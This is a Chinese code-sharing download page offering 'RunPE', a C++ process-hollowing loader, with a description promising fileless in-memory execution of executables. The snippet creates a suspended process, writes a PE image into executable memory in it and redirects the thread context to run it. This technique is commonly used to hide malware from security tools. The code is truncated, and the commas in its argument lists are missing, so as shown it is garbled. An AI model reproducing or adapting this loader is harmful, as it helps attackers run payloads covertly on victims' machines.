资源简介
一种进程注入技术,有兴趣稍加改动可实现exe在不落地的情况下在内存中动态加载
代码片段和文件信息
#include // Standard C++ library for console I/O
#include // Standard C++ Library for string manip
#include // WinAPI Header
#include //WinAPI Process API
// use this if you want to read the executable from disk
HANDLE MapFileToMemory(LPCSTR filename)
{
std::streampos size;
std::fstream file(filename std::ios::in | std::ios::binary | std::ios::ate);
if (file.is_open())
{
size = file.tellg();
char* Memblock = new char[size]();
file.seekg(0 std::ios::beg);
file.read(Memblock size);
file.close();
return Memblock;
}
return 0;
}
int RunPortableExecutable(void* Image)
{
IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
IMAGE_SECTION_HEADER* SectionHeader;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
CONTEXT* CTX;
DWORD* Imagebase; //base address of the image
void* pImagebase; // Pointer to the image base
int count;
char CurrentFilePath[1024];
DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // Initialize
GetModuleFileNameA(0 CurrentFilePath 1024); // path to current executable
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
{
ZeroMemory(&PI sizeof(PI)); // Null the memory
ZeroMemory(&SI sizeof(SI)); // Null the memory
if (CreateProcessA(CurrentFilePath NULL NULL NULL FALSE
CREATE_SUSPENDED NULL NULL &SI &PI)) // Create a new instance of current
//process in suspended state for the new image.
{
// Allocate memory for the context.
CTX = LPCONTEXT(VirtualAlloc(NULL sizeof(CTX) MEM_COMMIT PAGE_READWRITE));
CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
if (GetThreadContext(PI.hThread LPCONTEXT(CTX))) //if context is in thread
{
// Read instructions
ReadProcessMemory(PI.hProcess LPCVOID(CTX->Ebx + 8) LPVOID(&Imagebase) 4 0);
pImagebase = VirtualAllocEx(PI.hProcess LPVOID(NtHeader->OptionalHeader.Imagebase)
NtHeader->OptionalHeader.SizeOfImage 0x3000 PAGE_EXECUTE_READWRITE);
// Write the image to the process
WriteProcessMemory(PI.hProcess pImagebase Image NtHeader->OptionalHeader.SizeOfHeaders NULL);
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
{
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));
WriteProcessMemory(PI.hProcess LPVOID(DWORD(pImagebase) + SectionHeader->VirtualAddress)
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData) SectionHeader->SizeOfRawData 0);
}
WriteProcessMemory(PI.hProcess LPVOID(CTX->Ebx + 8)
LPVOID(&NtHeader->OptionalHeader.Imagebase) 4 0);
// Move address of entry point to the eax register
CTX->Eax = DWORD(pImagebase) + NtHeader->OptionalHea
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
目录 0 2016-11-07 15:37 RunPE-master\
文件 3554 2016-11-07 15:37 RunPE-master\RunPE.cpp
- 上一篇:广工anyview7-9章参考答案
- 下一篇:officescan.rar
评论
共有 条评论